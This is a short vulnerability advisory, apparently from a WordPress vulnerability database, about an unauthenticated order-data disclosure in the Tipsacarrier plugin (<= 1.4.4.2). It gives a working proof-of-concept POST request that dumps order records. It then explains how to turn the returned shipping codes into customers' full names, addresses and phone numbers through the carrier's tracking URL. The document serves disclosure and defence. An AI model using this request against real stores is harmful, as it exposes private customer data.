Tipsacarrier <= 1.4.4.2 - Unauthenticated Orders Disclosure

The plugin does not have any authorisation check in place some functions, which could allow unauthenticated users to access Orders data which could be used to retrieve the client full address, name and phone via tracking URL Vendor was notified on November 26th, 2021, did not reply nor fix the issue

PoC

POST /wp-content/plugins/tipsacarrier/js/consulta_datos.php HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 59 Connection: close Upgrade-Insecure-Requests: 1 page=1&rows;=5000&sidx;=id_envio_order&sord;=DESC&_search=true The response includes the same data that only an administrator in the plugin page can see. Including: - The [orderid] number. - [creation date] for the order. - The [shipping agency order code] which you can use at the agency website tracking URL: https://dinapaqweb.tipsa-dinapaq.com/dinapaqweb/detalle_envio.php?servicio=[shipping agency order code]&fecha;=[creation date in dd/mm/YYYY format] to retrieve client full address, full name, phone, and other data. - The order shipping status [shipping agency status]. - An URL where you can download the printing tag accessing to [printing tag url] with no authentication, located in /wp-content/uploads.